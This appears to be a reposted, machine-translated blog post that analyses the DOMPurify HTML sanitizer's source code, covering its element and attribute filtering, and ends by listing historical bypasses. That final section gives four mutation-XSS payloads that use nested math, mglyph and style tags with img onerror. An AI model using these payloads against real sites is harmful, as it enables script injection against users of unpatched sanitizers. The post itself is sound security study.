当前位置：网站首页>Analysis of dompurify

Analysis of dompurify

2022-06-24 15:16:00 【Deen_】

0x00 DOMPurify Introduce

DOMPurify Is an open source based on DOM Fast XSS Purification tools . Input HTML Elements , And then through DOM Parsing recursive element nodes , Conduct purification , Output safe HTML.

github Address ：https://github.com/cure53/DOMPurify

Now the latest version ：2.2.8

The official introduction

0x01 Common use

const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');

const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

const clean = DOMPurify.sanitize("<img/src=x onerror=alert(1)>");

This code finally outputs <img src="x">

DOMPurify.sanitize Functions are the most common use , You can also take two parameters , The second parameter bit is the related configuration . Refer to official documents .

0x02 Debugging exploration

DOMPurify Using the ES6 Chinese grammar , I intend to pass webstorm Use node debug , So there are still some operations , as follows （ May refer to ：Node.js Use in ES6 Medium import / export It's a complete collection of methods ）：

The code under this directory https://github.com/cure53/DOMPurify/tree/main/src Pull it all down , Change the suffix to mjs.import createDOMPurify from "./DOMPurify-main/src/purify.mjs"; import JSDOM from 'jsdom'; const window = new JSDOM.JSDOM('').window; const DOMPurify = createDOMPurify(window); const html = "<img/src=x onerror=alert(1)>"; console.log(DOMPurify.sanitize(html));
Their own main.js The code is
node Add startup parameters --experimental-modules

Launch parameters

0x03 sanitize Code follow up

Main code

Follow up analysis santize The main code of the function ：

const nodeIterator = _createIterator(IN_PLACE ? dirty : body);

/* Now start iterating over the created document */
while ((currentNode = nodeIterator.nextNode())) {
  /* Fix IE's strange behavior with manipulated textNodes #89 */
  if (currentNode.nodeType === 3 && currentNode === oldNode) {
    continue;
  }

  /* Sanitize tags and elements */
  if (_sanitizeElements(currentNode)) {
    continue;
  }

  /* Shadow DOM detected, sanitize it */
  if (currentNode.content instanceof DocumentFragment) {
   _sanitizeShadowDOM(currentNode.content);
  }

  /* Check attributes, sanitize if necessary */
  _sanitizeAttributes(currentNode);

  oldNode = currentNode;
}

oldNode = null;

dirty For the object to be purified , That is, the data we entered .

First, through _createIterator Function and while ((currentNode = nodeIterator.nextNode())), Will convert the input elements into one by one HTMLelement Elements . Such as <img src=x><svg src=x> Will turn into img and svg Two elements
Then enter while Of body To operate , here currentNode namely img and svg Elements .
There will be two purification operations , One is _sanitizeElements, One is _sanitizeAttributes .
_sanitizeElements function , seeing the name of a thing one thinks of its function , I.e. purification label
_sanitizeAttributes That is, the attributes of the purification label

_sanitizeElements function

/* Check if tagname contains Unicode */
if (stringMatch(currentNode.nodeName, /[\u0080-\uFFFF]/)) {
  _forceRemove(currentNode);
  return true;
}

/* Now let's check the element's type and name */
const tagName = stringToLowerCase(currentNode.nodeName);

The tag name contains unicode Character , Remove directly . Then the same tag name is converted to lowercase .

    if (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) {
      /* Keep content except for bad-listed elements */
      if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
        const parentNode = getParentNode(currentNode) || currentNode.parentNode;
        const childNodes = getChildNodes(currentNode) || currentNode.childNodes;

        if (childNodes && parentNode) {
          const childCount = childNodes.length;

          for (let i = childCount - 1; i >= 0; --i) {
            parentNode.insertBefore(
              cloneNode(childNodes[i], true),
              getNextSibling(currentNode)
            );
          }
        }
      }

      _forceRemove(currentNode);
      return true;
    }

Filter tags that are not on the white list , The white list is tags.js.

export const html = freeze([
  'a',
  'abbr',
  'acronym',
  'address',
  'area',
  'article',
  'aside',
  'audio',
  'b',
  ......

    /* Check whether element has a valid namespace */
    if (currentNode instanceof Element && !_checkValidNamespace(currentNode)) {
      _forceRemove(currentNode);
      return true;
    }

    if (
      (tagName === 'noscript' || tagName === 'noembed') &&
      regExpTest(/<\/no(script|embed)/i, currentNode.innerHTML)
    ) {
      _forceRemove(currentNode);
      return true;
    }

Verify namespace , There used to be bypass, Here's another one noscript Label verification operation , I feel a little redundant , Because it's not on the white list , Already on top of it is remove 了 .

_sanitizeAttributes function

First of all, whatever the attribute , Directly from the current currentNode remove.

if (hookEvent.forceKeepAttr) {
continue;
}

/* Remove attribute */
_removeAttribute(name, currentNode);

/* Did the hooks approve of the attribute? */
if (!hookEvent.keepAttr) {
continue;
}

Then according to the tag name , And property names , The value of the property is a _isValidAttribute The judgment of the .

const lcTag = currentNode.nodeName.toLowerCase();
if (!_isValidAttribute(lcTag, lcName, value)) {
continue;
}

If it's legal attr, Call setAttribute Methods will attr To restore .

pivotal _isValidAttribute function . You can debug to try to bypass ....nice try....

      if (ALLOW_DATA_ATTR && regExpTest(DATA_ATTR, lcName)) {
        // This attribute is safe
      } else if (ALLOW_ARIA_ATTR && regExpTest(ARIA_ATTR, lcName)) {
        // This attribute is safe
        /* Otherwise, check the name is permitted */
      } else if (!ALLOWED_ATTR[lcName] || FORBID_ATTR[lcName]) {
        return false;

        /* Check value is safe. First, is attr inert? If so, is safe */
      } else if (URI_SAFE_ATTRIBUTES[lcName]) {
        // This attribute is safe
        /* Check no script, data or unknown possibly unsafe URI
          unless we know URI values are safe for that attribute */
      } else if (
        regExpTest(IS_ALLOWED_URI, stringReplace(value, ATTR_WHITESPACE, ''))
      ) {
        // This attribute is safe
        /* Keep image data URIs alive if src/xlink:href is allowed */
        /* Further prevent gadget XSS for dynamically built script tags */
      } else if (
        (lcName === 'src' || lcName === 'xlink:href' || lcName === 'href') &&
        lcTag !== 'script' &&
        stringIndexOf(value, 'data:') === 0 &&
        DATA_URI_TAGS[lcTag]
      ) {
        // This attribute is safe
        /* Allow unknown protocols: This provides support for links that
          are handled by protocol handlers which may be unknown ahead of
          time, e.g. fb:, spotify: */
      } else if (
        ALLOW_UNKNOWN_PROTOCOLS &&
        !regExpTest(IS_SCRIPT_OR_DATA, stringReplace(value, ATTR_WHITESPACE, ''))
      ) {
        // This attribute is safe
        /* Check for binary attributes */
        // eslint-disable-next-line no-negated-condition
      } else if (!value) {
        // Binary attributes are safe at this point
        /* Anything else, presume unsafe, do not add it back */
      } else {
        return false;
      }

0x04 history Bypass

Can be in pull requests and releases The update log of found , Such as ：

Obfuscate namespaces to bypass ：https://github.com/cure53/DOMPurify/pull/495

Update log

payloads：

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<math><mtext><table><mglyph><style><img src=1 onerror=alert(1)>">
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(\'XSS\') src>">

原网站

版权声明
本文为[Deen_]所创，转载请带上原文链接，感谢
https://yzsam.com/2021/05/20210519013046297e.html